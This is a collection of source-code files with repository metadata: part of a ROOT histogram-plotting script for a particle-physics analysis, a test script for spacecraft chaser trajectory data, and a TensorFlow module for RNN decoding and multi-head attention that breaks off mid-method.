c2.SetRightMargin(0.2);
h.Draw(drawopt)
if doPng: c2.Print("{}/{}.png".format(plotdir,h.GetName()))
if doPdf: c2.Print("{}/{}.pdf".format(plotdir,h.GetName()))
if doC : c2.Print("{}/{}.C".format(plotdir,h.GetName()))
h.Write()
return
def drawAll1D(c1,drawopt="hist"):
for n, h in hists1D.items():
draw1D(c1,h, drawopt);
return
def drawAll2D(c2,drawopt="hist"):
for n, h in hists2D.items():
draw2D(c2,h, drawopt);
return
def get1D(sample,dist):
# Get hist
if "QCD" in sample: hist = getQCD(dist)
else :
filename = "output/{}.root".format(sample)
f = ROOT.TFile.Open(filename)
histname = "{}_{}".format(sample,dist)
hist = f.Get(histname)
hist.Scale(sig_xs(sample))
# if hist exists
if hist :
hist.SetDirectory(0)
return hist
else : return 0
def sig_xs(sample):
if "125" in sample : return 34.8 / 100000 * lumi
if "200" in sample : return 13.6 / 500000 * lumi
if "300" in sample : return 8.9 / 500000 * lumi
if "400" in sample : return 5.9 / 100000 * lumi
if "750" in sample : return 0.5 / 100000 * lumi
if "1000" in sample : return 0.17 / 100000 * lumi
return 1.
def qcd_xs(sample):
if "QCD_HT200to300" in sample : return 1559000 / 100000 * lumi
if "QCD_HT300to500" in sample : return 347700 / 100000 * lumi #311900 - was missing k-factor
if "QCD_HT500to700" in sample : return 32100 / 100000 * lumi #29070 - was missing k-factor
if "QCD_HT700to1000" in sample : return 6831 / 100000 * lumi #5962 - was missing k-factor
if "QCD_HT1000to1500" in sample : return 1207 / 100000 * lumi
if "QCD_HT1500to2000" in sample : return 119.9 / 7242 * lumi # * 100000./7242. # missing some events
if "QCD_HT2000toInf" in sample : return 25.24 / 45606 * lumi # * 100000./45606. # missing some events
def getQCD(dist):
# Get hist
samples =[]
samples.append("QCD_HT200to300")# do slicing later
samples.append("QCD_HT300to500")# do slicing later
samples.append("QCD_HT500to700")# do slicing later
samples.append("QCD_HT700to1000")# do slicing later
samples.append("QCD_HT1000to1500")# do slicing later
samples.append("QCD_HT1500to2000")# do slicing later
samples.append("QCD_HT2000toInf")# do slicing later
hists = []
for sample in samples:
f = ROOT.TFile.Open("output/{}.root".format(sample))
if not f: continue
h = f.Get("{}_{}".format(sample,dist))
if not h:
#print("Missing hist: {}_{}".format(sample,dist))
continue
#scale to xs * lumi * totalweights
h.Scale(qcd_xs(sample))
h.SetDirectory(0)
hists.append(h)
if len(hists)==0: return 0
hist_final = hists[0].Clone("QCD_"+dist)
for i,hist in enumerate(hists):
if i>0: hist_final.Add(hist)
#if "scouting_htL" in dist:
# print("KARRI TEST")
# print("INT {}".format( hist_final.Integral() ) )
#if "offline_htL" in dist:
# print("KARRI TEST")
# print("INT {}".format( hist_final.Integral() ) )
#hist_final.Scale(40048/hist_final.Integral()) #40048 events in data passing hT cut...
#clean1D(hist_final)
hist_final.SetDirectory(0)
return hist_final
| [
"kdipetrillo@gmail.com"
] | kdipetrillo@gmail.com |
211752c4f07d02d49629acc90f61bcdae83eb752 | 2dd3521d7eac776d498be33a9c5f24e13240f971 | /code/testing.py | c649a43bc084b67ff3ee7990ac7dd0d03ccb73d5 | [] | no_license | AlejandrodeMiguel96/MSc-thesis-on-progress | bcb25cc16a2fc77dec6fc60237bdfc72481f362c | 5c504c668d8435979d1a4fbd45cebf5416f61534 | refs/heads/main | 2023-07-10T01:07:33.634536 | 2021-08-11T00:14:03 | 2021-08-11T00:14:03 | 377,937,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,815 | py | import numpy as np
import matplotlib.pyplot as plt
import statistics
import time
import data_inspection
# data = np.load('database_consistency.npz', allow_pickle=True)
# data = np.load('database_consistency_300_10examples.npz', allow_pickle=True)
# data = np.load('database_consistency_1000_60examples.npz', allow_pickle=True)
# data = np.load('database_consistency_10000_17examples.npz', allow_pickle=True)
# data = np.load('database_consistency_1000_1339examples.npz', allow_pickle=True)
# data = np.load('database_consistency_5000_60examples.npz', allow_pickle=True)
data = np.load('database_consistency_100_960examples.npz', allow_pickle=True)
database = data['database']
leg1 = database[40]
from data_initial_conditions import state0_ifo
from compare_legs import build_leg
state0_chaser = state0_ifo
inputs = [*leg1.w_vec[0, :], *leg1.q_vec[0, :]]
outputs = [*leg1.dv, leg1.t_leg]
built_leg = build_leg(inputs, outputs, state0_chaser)
built_leg2 = build_leg(inputs, outputs, state0_chaser)
a = leg1.score
b = built_leg.score
c = built_leg2.score
scores = []
dv_and_t = []
for s in database:
scores.append(s.score)
dv_and_t.append((*s.dv, s.t_leg))
dv_norm = np.linalg.norm(s.dv)
if not (data_inspection.deltav_min <= dv_norm <= data_inspection.deltav_max or dv_norm == 0):
print('error dv!!!', dv_norm)
scores = np.array(scores)
scores_sorted = np.array(sorted(scores, reverse=True))
dv_and_t = np.array(dv_and_t)
avrg_score = statistics.mean(scores)
var_score = statistics.variance(scores, avrg_score)
std_score = statistics.stdev(scores, avrg_score)
avrg_dvx = statistics.mean(dv_and_t[:, 0])
var_dvx = statistics.variance(dv_and_t[:, 0], avrg_dvx)
std_dvx = statistics.stdev(dv_and_t[:, 0], avrg_dvx)
avrg_dvy = statistics.mean(dv_and_t[:, 1])
var_dvy = statistics.variance(dv_and_t[:, 1], avrg_dvy)
std_dvy = statistics.stdev(dv_and_t[:, 1], avrg_dvy)
avrg_dvz = statistics.mean(dv_and_t[:, 2])
var_dvz = statistics.variance(dv_and_t[:, 2], avrg_dvz)
std_dvz = statistics.stdev(dv_and_t[:, 2], avrg_dvz)
avrg_t_leg = statistics.mean(dv_and_t[:, 3])
var_t_leg = statistics.variance(dv_and_t[:, 3], avrg_t_leg)
std_t_leg = statistics.stdev(dv_and_t[:, 3], avrg_t_leg)
# # PLOTS
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('v-bar [km]')
ax.set_ylabel('b-bar [km]')
ax.set_zlabel('h-bar [km]')
ax.set_title('Chaser wrt target')
plt.grid()
for s in database[:]:
print(s.score)
ax.plot(s.rr_chaser_LVLH[:, 0], s.rr_chaser_LVLH[:, 1], s.rr_chaser_LVLH[:, 2])
ax.plot(s.rr_chaser_LVLH[0, 0], s.rr_chaser_LVLH[0, 1], s.rr_chaser_LVLH[0, 2], 'g*', label='starting point')
ax.plot(s.rr_chaser_LVLH[-1, 0], s.rr_chaser_LVLH[-1, 1], s.rr_chaser_LVLH[-1, 2], 'r*', label='ending point')
a = 0
plt.show()
print('sacabo')
| [
"noreply@github.com"
] | noreply@github.com |
699217857bdbf1f709123b843e8bbc301dfeee0a | a859aadea24af173a175c2d01910314487ec6fbf | /common/ops_rnn_v2.py | acd3ae1ce052c94ce4a70df353ea57d9d33f42f4 | [
"BSD-3-Clause"
] | permissive | jiahuei/tf-sparse-captioning | cc52cbef5590b47727ea89f265011c9ab58aebad | 9d7b8ecdd44fb1541500ca4f920d6c94fd15bad1 | refs/heads/main | 2023-04-07T05:27:28.395758 | 2021-04-19T11:27:28 | 2021-04-19T11:27:28 | 359,341,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,951 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 27 16:22:42 2017
@author: jiahuei
"""
# import numpy as np
import logging
import tensorflow as tf
# from tensorflow.python.framework import ops
# from tensorflow.python.ops import rnn_cell_impl
from tensorflow.contrib.seq2seq.python.ops.beam_search_decoder import _check_batch_beam, gather_tree_from_array
from tensorflow.contrib.seq2seq.python.ops import attention_wrapper
from tensorflow.python.layers.core import Dense
# from tensorflow.python.layers import base
# from tensorflow.python.framework import dtypes
# from common.mask_prune import sampler
from common.mask_prune import masked_layer
from common.ops_v1 import layer_norm_activate, dprint
from common.ops_v1 import shape as _shape
# from packaging import version
AttentionWrapperState = tf.contrib.seq2seq.AttentionWrapperState
logger = logging.getLogger(__name__)
_DEBUG = False
def _dprint(string):
return dprint(string, _DEBUG)
def _layer_norm_tanh(tensor):
# if version.parse(tf.__version__) >= version.parse('1.9'):
try:
tensor = layer_norm_activate(
'LN_tanh',
tensor,
tf.nn.tanh,
begin_norm_axis=-1)
except TypeError:
tensor_s = _shape(tensor)
tensor = layer_norm_activate(
'LN_tanh',
tf.reshape(tensor, [-1, tensor_s[-1]]),
tf.nn.tanh)
tensor = tf.reshape(tensor, tensor_s)
return tensor
###############################################################################
def rnn_decoder_beam_search(cell,
embedding_fn,
output_layer,
batch_size,
beam_size,
length_penalty_weight,
maximum_iterations,
start_id,
end_id,
swap_memory=True):
"""
Dynamic RNN loop function for inference. Performs beam search.
Operates in time-major mode.
Args:
cell: An `RNNCell` instance (with or without attention).
embedding_fn: Either embedding Variable or embedding function.
output_layer: An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Layer to apply to the RNN output prior to
storing the result or sampling. Pass `None` to disable it.
batch_size: Int scalar. Size of batch.
beam_size: `Int scalar. Size of beam for beam search.
length_penalty_weight: Float weight to penalise length.
Disabled with 0.0.
maximum_iterations: Int scalar. Maximum number of decoding steps.
start_id: `int32` scalar, the token that marks start of decoding.
end_id: `int32` scalar, the token that marks end of decoding.
swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
Argument passed to `tf.while_loop`.
Returns:
top_sequence, top_score, None
"""
logger.debug('Building subgraph V4 for Beam Search.')
state_init = cell.zero_state(batch_size * beam_size, tf.float32)
start_ids = tf.tile([start_id], multiples=[batch_size])
_dprint('rnn_decoder_beam_search: Initial state: {}'.format(state_init))
_dprint('rnn_decoder_beam_search: Cell state size: {}'.format(cell.state_size))
# decoder = tf.contrib.seq2seq.BeamSearchDecoder(
decoder = BeamSearchDecoderMultiHead(
cell=cell,
embedding=embedding_fn,
start_tokens=start_ids,
end_token=end_id,
initial_state=state_init,
beam_width=beam_size,
output_layer=output_layer,
length_penalty_weight=length_penalty_weight,
reorder_tensor_arrays=True) # r1.9 API
dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
decoder=decoder,
output_time_major=True,
impute_finished=False,
maximum_iterations=maximum_iterations,
parallel_iterations=1,
swap_memory=swap_memory)
_dprint('rnn_decoder_beam_search: Final BeamSearchDecoderState: {}'.format(dec_states))
# `dec_outputs` will be a `FinalBeamSearchDecoderOutput` object
# `dec_states` will be a `BeamSearchDecoderState` object
predicted_ids = dec_outputs.predicted_ids # (time, batch_size, beam_size)
scores = dec_outputs.beam_search_decoder_output.scores # (time, batch_size, beam_size)
# top_sequence = predicted_ids[:, :, 0]
# top_score = scores[:, :, 0] # log-softmax scores
return predicted_ids, scores, dec_states.cell_state
def rnn_decoder_search(cell,
embedding_fn,
output_layer,
batch_size,
maximum_iterations,
start_id,
end_id,
swap_memory=True,
greedy_search=True):
"""
Dynamic RNN loop function for inference. Performs greedy search / sampling.
Operates in time-major mode.
Args:
cell: An `RNNCell` instance (with or without attention).
embedding_fn: A callable that takes a vector tensor of `ids`
(argmax ids), or the `params` argument for `embedding_lookup`.
The returned tensor will be passed to the decoder input.
output_layer: An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Layer to apply to the RNN output prior to
storing the result or sampling. Pass `None` to disable it.
batch_size: Int scalar. Size of batch.
maximum_iterations: Int scalar. Maximum number of decoding steps.
start_id: `int32` scalar, the token that marks start of decoding.
end_id: `int32` scalar, the token that marks end of decoding.
swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
Argument passed to `tf.while_loop`.
greedy_search: Python bool, use argmax if True, sample from
distribution if False.
Returns:
output_ids, rnn_outputs, decoder_state
"""
# Initialise `AttentionWrapperState` with provided RNN state
state_init = cell.zero_state(batch_size, tf.float32)
start_ids = tf.tile([start_id], multiples=[batch_size])
_dprint('rnn_decoder_search: Initial state: {}'.format(state_init))
_dprint('rnn_decoder_search: Cell state size: {}'.format(cell.state_size))
if greedy_search:
logger.debug('Building subgraph V4 for Greedy Search.')
helper_fn = tf.contrib.seq2seq.GreedyEmbeddingHelper
else:
logger.debug('Building subgraph V4 for Sample Search.')
helper_fn = tf.contrib.seq2seq.SampleEmbeddingHelper
helper = helper_fn(
embedding=embedding_fn,
start_tokens=start_ids,
end_token=end_id)
decoder = tf.contrib.seq2seq.BasicDecoder(
cell=cell,
helper=helper,
initial_state=state_init,
output_layer=output_layer)
dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
decoder=decoder,
output_time_major=True,
impute_finished=False,
maximum_iterations=maximum_iterations,
parallel_iterations=1,
swap_memory=swap_memory)
# `dec_outputs` will be a `BasicDecoderOutput` object
# `dec_states` may be a `AttentionWrapperState` object
rnn_out = dec_outputs.rnn_output
output_ids = dec_outputs.sample_id
return output_ids, rnn_out, dec_states
def rnn_decoder_training(cell,
embeddings,
output_layer,
batch_size,
sequence_length,
swap_memory=True):
"""
Dynamic RNN loop function for training. Operates in time-major mode.
The decoder will run until <EOS> token is encountered.
Args:
cell: An `RNNCell` instance (with or without attention).
embeddings: A float32 tensor of shape [time, batch, word_size].
output_layer: An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Layer to apply to the RNN output prior to
storing the result or sampling. Pass `None` to disable it.
batch_size: Int scalar. Size of batch.
sequence_length: An int32 vector tensor. Length of sequence.
swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
Argument passed to `tf.while_loop`.
Returns:
output_ids, rnn_outputs, decoder_state
"""
logger.debug('Building dynamic decode subgraph V4 for training.')
# Initialise `AttentionWrapperState` with provided RNN state
# batch_size = tf.shape(embeddings)[1]
state_init = cell.zero_state(batch_size, tf.float32)
_dprint('rnn_decoder_training: Initial state: {}'.format(state_init))
_dprint('rnn_decoder_training: Cell state size: {}'.format(cell.state_size))
helper = tf.contrib.seq2seq.TrainingHelper(
inputs=embeddings,
sequence_length=sequence_length,
time_major=True)
decoder = tf.contrib.seq2seq.BasicDecoder(
cell=cell,
helper=helper,
initial_state=state_init,
output_layer=output_layer)
dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
decoder=decoder,
output_time_major=True,
impute_finished=True,
maximum_iterations=None,
parallel_iterations=1,
swap_memory=swap_memory)
# `dec_outputs` will be a `BasicDecoderOutput` object
# `dec_states` may be a `AttentionWrapperState` object
rnn_out = dec_outputs.rnn_output
output_ids = dec_outputs.sample_id
# Perform padding by copying elements from the last time step.
# This is required if `impute_finished` is True.
# This is skipped in inference mode.
pad_time = tf.shape(embeddings)[0] - tf.shape(rnn_out)[0]
pad = tf.tile(rnn_out[-1:, :, :], [pad_time, 1, 1])
rnn_out = tf.concat([rnn_out, pad], axis=0) # (max_time, batch_size, rnn_size)
pad_ids = tf.tile(output_ids[-1:, :], [pad_time, 1])
output_ids = tf.concat([output_ids, pad_ids], axis=0) # (max_time, batch_size)
return output_ids, rnn_out, dec_states
def split_heads(x, num_heads):
"""Split channels (dimension 3) into multiple heads (becomes dimension 1).
Args:
x: a Tensor with shape [batch, length, channels]
num_heads: an integer
Returns:
a Tensor with shape [batch, num_heads, length, channels / num_heads]
"""
old_shape = _shape(x)
last = old_shape[-1]
new_shape = old_shape[:-1] + [num_heads] + [last // num_heads if last else -1]
# new_shape = tf.concat([old_shape[:-1], [num_heads, last // num_heads]], 0)
return tf.transpose(tf.reshape(x, new_shape, 'split_head'), [0, 2, 1, 3])
def combine_heads(x):
"""Inverse of split_heads.
Args:
x: a Tensor with shape [batch, num_heads, length, channels / num_heads]
Returns:
a Tensor with shape [batch, length, channels]
"""
x = tf.transpose(x, [0, 2, 1, 3])
old_shape = _shape(x)
a, b = old_shape[-2:]
new_shape = old_shape[:-2] + [a * b if a and b else -1]
# l = old_shape[2]
# c = old_shape[3]
# new_shape = tf.concat([old_shape[:-2] + [l * c]], 0)
return tf.reshape(x, new_shape, 'combine_head')
###############################################################################
# noinspection PyProtectedMember
class MultiHeadAttV3(attention_wrapper._BaseAttentionMechanism):
"""
Implements multi-head attention.
"""
# TODO: bookmark
# noinspection PyCallingNonCallable
def __init__(self,
num_units,
feature_map,
fm_projection,
num_heads=None,
scale=True,
memory_sequence_length=None,
probability_fn=tf.nn.softmax,
mask_type=None,
mask_init_value=0,
mask_bern_sample=False,
name='MultiHeadAttV3'):
"""
Construct the AttentionMechanism mechanism.
Args:
num_units: The depth of the attention mechanism.
feature_map: The feature map / memory to query. This tensor
should be shaped `[batch_size, height * width, channels]`.
fm_projection: Feature map projection mode.
num_heads: Int, number of attention heads. (optional)
scale: Python boolean. Whether to scale the energy term.
memory_sequence_length: Tensor indicating sequence length.
probability_fn: (optional) A `callable`. Converts the score
to probabilities. The default is `tf.nn.softmax`.
name: Name to use when creating ops.
"""
logger.debug('Using MultiHeadAttV3.')
assert fm_projection in [None, 'independent', 'tied']
# if memory_sequence_length is not None:
# assert len(_shape(memory_sequence_length)) == 2, \
# '`memory_sequence_length` must be a rank-2 tensor, ' \
# 'shaped [batch_size, num_heads].'
if mask_type is None:
self._dense_layer = Dense
self._mask_params = {}
else:
self._dense_layer = masked_layer.MaskedDense
self._mask_params = dict(mask_type=mask_type,
mask_init_value=mask_init_value,
mask_bern_sample=mask_bern_sample)
super(MultiHeadAttV3, self).__init__(
query_layer=self._dense_layer(units=num_units, name='query_layer', use_bias=False, **self._mask_params),
# query is projected hidden state
memory_layer=self._dense_layer(units=num_units, name='memory_layer', use_bias=False, **self._mask_params),
# self._keys is projected feature_map
memory=feature_map, # self._values is feature_map
probability_fn=lambda score, _: probability_fn(score),
memory_sequence_length=None,
score_mask_value=float('-inf'),
name=name)
self._probability_fn = lambda score, _: (
probability_fn(
self._maybe_mask_score_multi(
score, memory_sequence_length, float('-inf'))))
self._fm_projection = fm_projection
self._num_units = num_units
self._num_heads = num_heads
self._scale = scale
self._feature_map_shape = _shape(feature_map)
self._name = name
if fm_projection == 'tied':
assert num_units % num_heads == 0, \
'For `tied` projection, attention size/depth must be ' \
'divisible by the number of attention heads.'
self._values_split = split_heads(self._keys, self._num_heads)
elif fm_projection == 'independent':
assert num_units % num_heads == 0, \
'For `untied` projection, attention size/depth must be ' \
'divisible by the number of attention heads.'
# Project and split memory
v_layer = self._dense_layer(units=num_units, name='value_layer', use_bias=False, **self._mask_params)
# (batch_size, num_heads, mem_size, num_units / num_heads)
self._values_split = split_heads(v_layer(self._values), self._num_heads)
else:
assert _shape(self._values)[-1] % num_heads == 0, \
'For `none` projection, feature map channel dim size must ' \
'be divisible by the number of attention heads.'
self._values_split = split_heads(self._values, self._num_heads)
_dprint('{}: FM projection type: {}'.format(
self.__class__.__name__, fm_projection))
_dprint('{}: Splitted values shape: {}'.format(
self.__class__.__name__, _shape(self._values_split)))
_dprint('{}: Values shape: {}'.format(
self.__class__.__name__, _shape(self._values)))
_dprint('{}: Keys shape: {}'.format(
self.__class__.__name__, _shape(self._keys)))
_dprint('{}: Feature map shape: {}'.format(
self.__class__.__name__, _shape(feature_map)))
@property
def values_split(self):
return self._values_split
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return a tensor of all zeros.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
del batch_size
s = _shape(self.values_split)[:-1]
init = tf.zeros(shape=[s[0], s[1] * s[2]], dtype=dtype)
_dprint('{}: Initial alignments shape: {}'.format(self.__class__.__name__, _shape(init)))
return init
def _maybe_mask_score_multi(self,
score,
memory_sequence_length,
score_mask_value):
if memory_sequence_length is None:
return score
message = 'All values in memory_sequence_length must greater than zero.'
with tf.control_dependencies(
[tf.assert_positive(memory_sequence_length, message=message)]):
print(_shape(score))
score_mask = tf.sequence_mask(
memory_sequence_length, maxlen=tf.shape(score)[2])
score_mask_values = score_mask_value * tf.ones_like(score)
masked_score = tf.where(score_mask, score, score_mask_values)
_dprint('{}: score shape: {}'.format(
self.__class__.__name__, _shape(score)))
_dprint('{}: masked_score shape: {}'.format(
self.__class__.__name__, _shape(masked_score)))
return masked_score
class MultiHeadAddLN(MultiHeadAttV3):
"""
Implements Toronto-style (Xu et al.) attention scoring with layer norm,
as described in:
"Show, Attend and Tell: Neural Image Caption Generation with
Visual Attention." ICML 2015. https://arxiv.org/abs/1502.03044
"""
def __call__(self, query, state):
"""
Score the query based on the keys and values.
Args:
query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
state: IGNORED. Previous alignment values.
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
del state
with tf.variable_scope(None, 'multi_add_attention', [query]):
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
proj_query = tf.expand_dims(self.query_layer(query), 1)
v = tf.get_variable(
'attention_v', [self._num_units], dtype=proj_query.dtype)
if len(self._mask_params) > 0:
v, _ = masked_layer.generate_masks(kernel=v, bias=None,
dtype=proj_query.dtype,
**self._mask_params)
score = self._keys + proj_query
score = _layer_norm_tanh(score)
score = tf.multiply(score, v)
score = split_heads(score, self._num_heads) # (batch_size, num_heads, mem_size, num_units / num_heads)
score = tf.reduce_sum(score, axis=3) # (batch_size, num_heads, mem_size)
if self._scale:
softmax_temperature = tf.get_variable(
'softmax_temperature',
shape=[],
dtype=tf.float32,
initializer=tf.constant_initializer(5.0),
collections=[tf.GraphKeys.GLOBAL_VARIABLES,
'softmax_temperatures'])
score = tf.truediv(score, softmax_temperature)
alignments = self._probability_fn(score, None)
next_state = alignments
_dprint('{}: Alignments shape: {}'.format(
self.__class__.__name__, _shape(alignments)))
return alignments, next_state
class MultiHeadAdd(MultiHeadAttV3):
"""
Implements Toronto-style (Xu et al.) attention scoring,
as described in:
"Show, Attend and Tell: Neural Image Caption Generation with
Visual Attention." ICML 2015. https://arxiv.org/abs/1502.03044
"""
def __call__(self, query, state):
"""
Score the query based on the keys and values.
Args:
query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
state: IGNORED. Previous alignment values.
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
del state
with tf.variable_scope(None, 'MultiHeadAdd', [query]):
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
proj_query = tf.expand_dims(self.query_layer(query), 1)
v = tf.get_variable(
'attention_v', [self._num_units], dtype=proj_query.dtype)
if len(self._mask_params) > 0:
v, _ = masked_layer.generate_masks(kernel=v,
bias=None,
dtype=proj_query.dtype,
**self._mask_params)
score = self._keys + proj_query
score = tf.nn.tanh(score)
score = tf.multiply(score, v)
score = split_heads(score, self._num_heads) # (batch_size, num_heads, mem_size, num_units / num_heads)
score = tf.reduce_sum(score, axis=3) # (batch_size, num_heads, mem_size)
alignments = self._probability_fn(score, None)
next_state = alignments
_dprint('{}: Alignments shape: {}'.format(
self.__class__.__name__, _shape(alignments)))
return alignments, next_state
class MultiHeadDot(MultiHeadAttV3):
"""
Implements scaled dot-product scoring,
as described in:
"Attention is all you need." NIPS 2017.
https://papers.nips.cc/paper/7181-attention-is-all-you-need.pdf
"""
def __call__(self, query, state):
"""
Score the query based on the keys and values.
Args:
query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
state: IGNORED. Previous alignment values.
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
del state
with tf.variable_scope(None, 'MultiHeadDot', [query]):
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
proj_query = tf.expand_dims(self.query_layer(query), 1) # (batch_size, 1, num_units)
score = tf.multiply(self._keys, proj_query)
score = split_heads(score, self._num_heads) # (batch_size, num_heads, mem_size, num_units / num_heads)
score = tf.reduce_sum(score, axis=3) # (batch_size, num_heads, mem_size)
score /= tf.sqrt(self._num_units / self._num_heads)
alignments = self._probability_fn(score, None)
next_state = alignments
_dprint('{}: Alignments shape: {}'.format(
self.__class__.__name__, _shape(alignments)))
return alignments, next_state
# noinspection PyProtectedMember
class MultiHeadAttentionWrapperV3(attention_wrapper.AttentionWrapper):
"""
Wraps another `RNNCell` with attention, similar to `AttentionWrapper`.
Allows optional multi-head attention.
Logits projection should be performed at the decoder by passing in
an instance of `tf.layers.Layer`, as argument for `output_layer`.
skip_att_threshold: If value is in range (0, 1), perform binarisation; else perform bernoulli sampling.
"""
# TODO: bookmark
def __init__(self,
context_layer=True,
alignments_keep_prob=1.0,
mask_type=None,
mask_init_value=0,
mask_bern_sample=False,
**kwargs):
logger.debug('Using {}.'.format(self.__class__.__name__))
super(MultiHeadAttentionWrapperV3, self).__init__(**kwargs)
if len(self._attention_mechanisms) != 1:
raise ValueError('Only a single attention mechanism can be used.')
self._context_layer = context_layer
self._alignments_keep_prob = alignments_keep_prob
if mask_type is None:
self._dense_layer = Dense
self._mask_params = {}
else:
self._dense_layer = masked_layer.MaskedDense
self._mask_params = dict(mask_type=mask_type,
mask_init_value=mask_init_value,
mask_bern_sample=mask_bern_sample)
# noinspection PyCallingNonCallable
def call(self, inputs, prev_state):
"""
Perform a step of attention-wrapped RNN.
This method assumes `inputs` is the word embedding vector.
This method overrides the original `call()` method.
"""
_attn_mech = self._attention_mechanisms[0]
attn_size = _attn_mech._num_units
batch_size = _attn_mech.batch_size
dtype = inputs.dtype
# Step 1: Calculate the true inputs to the cell based on the
# previous attention value.
# `_cell_input_fn` defaults to
# `lambda inputs, attention: array_ops.concat([inputs, attention], -1)`
_dprint('{}: prev_state received by call(): {}'.format(
self.__class__.__name__, prev_state))
cell_inputs = self._cell_input_fn(inputs, prev_state.attention)
prev_cell_state = prev_state.cell_state
cell_output, curr_cell_state = self._cell(cell_inputs, prev_cell_state)
cell_batch_size = (cell_output.shape[0].value or tf.shape(cell_output)[0])
error_message = (
"When applying AttentionWrapper %s: " % self.name +
"Non-matching batch sizes between the memory (encoder output) "
"and the query (decoder output). Are you using the "
"BeamSearchDecoder? You may need to tile your memory input via "
"the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with tf.control_dependencies(
[tf.assert_equal(cell_batch_size, _attn_mech.batch_size, message=error_message)]):
cell_output = tf.identity(cell_output, name="checked_cell_output")
dtype = cell_output.dtype
assert len(self._attention_mechanisms) == 1
_attn_mech = self._attention_mechanisms[0]
alignments, attention_state = _attn_mech(cell_output, state=None)
if self._alignments_keep_prob < 1.:
alignments = tf.contrib.layers.dropout(inputs=alignments,
keep_prob=self._alignments_keep_prob,
noise_shape=None,
is_training=True)
if len(_shape(alignments)) == 3:
# Multi-head attention
# Expand from [batch_size, num_heads, memory_time] to [batch_size, num_heads, 1, memory_time]
expanded_alignments = tf.expand_dims(alignments, 2)
# attention_mechanism.values shape is
# [batch_size, num_heads, memory_time, num_units / num_heads]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, num_heads, 1, num_units / num_heads].
# we then combine the heads
# [batch_size, 1, attention_mechanism.num_units]
attention_mechanism_values = _attn_mech.values_split
context = tf.matmul(expanded_alignments, attention_mechanism_values)
attention = tf.squeeze(combine_heads(context), [1])
else:
# Expand from [batch_size, memory_time] to [batch_size, 1, memory_time]
expanded_alignments = tf.expand_dims(alignments, 1)
# Context is the inner product of alignments and values along the
# memory time dimension.
# alignments shape is
# [batch_size, 1, memory_time]
# attention_mechanism.values shape is
# [batch_size, memory_time, attention_mechanism.num_units]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, 1, attention_mechanism.num_units].
# we then squeeze out the singleton dim.
attention_mechanism_values = _attn_mech.values
context = tf.matmul(expanded_alignments, attention_mechanism_values)
attention = tf.squeeze(context, [1])
# Context projection
if self._context_layer:
# noinspection PyCallingNonCallable
attention = self._dense_layer(name='a_layer',
units=_attn_mech._num_units,
use_bias=False,
activation=None,
dtype=dtype,
**self._mask_params)(attention)
if self._alignment_history:
alignments = tf.reshape(alignments, [cell_batch_size, -1])
alignment_history = prev_state.alignment_history.write(prev_state.time, alignments)
else:
alignment_history = ()
curr_state = attention_wrapper.AttentionWrapperState(
time=prev_state.time + 1,
cell_state=curr_cell_state,
attention=attention,
attention_state=alignments,
alignments=alignments,
alignment_history=alignment_history
)
return cell_output, curr_state
@property
def state_size(self):
state = super(MultiHeadAttentionWrapperV3, self).state_size
_attn_mech = self._attention_mechanisms[0]
s = _shape(_attn_mech._values_split)[1:3]
state = state._replace(alignments=s[0] * s[1],
alignment_history=s[0] * s[1] if self._alignment_history else (),
attention_state=s[0] * s[1])
if _attn_mech._fm_projection is None and self._context_layer is False:
state = state.clone(attention=_attn_mech._feature_map_shape[-1])
else:
state = state.clone(attention=_attn_mech._num_units)
_dprint('{}: state_size: {}'.format(self.__class__.__name__, state))
return state
# noinspection PyProtectedMember
def zero_state(self, batch_size, dtype):
state = super(MultiHeadAttentionWrapperV3, self).zero_state(
batch_size, dtype)
_attn_mech = self._attention_mechanisms[0]
tf_ary_kwargs = dict(dtype=dtype,
size=0,
dynamic_size=True,
element_shape=None)
if _attn_mech._fm_projection is None and self._context_layer is False:
state = state._replace(
attention=tf.zeros(
[batch_size, _attn_mech._feature_map_shape[-1]], dtype),
alignment_history=tf.TensorArray(**tf_ary_kwargs) if self._alignment_history else ())
else:
state = state._replace(
attention=tf.zeros(
[batch_size, _attn_mech._num_units], dtype),
alignment_history=tf.TensorArray(**tf_ary_kwargs) if self._alignment_history else ())
_dprint('{}: zero_state: {}'.format(self.__class__.__name__, state))
return state
class BeamSearchDecoderMultiHead(tf.contrib.seq2seq.BeamSearchDecoder):
# noinspection PyProtectedMember
def _maybe_sort_array_beams(self, t, parent_ids, sequence_length):
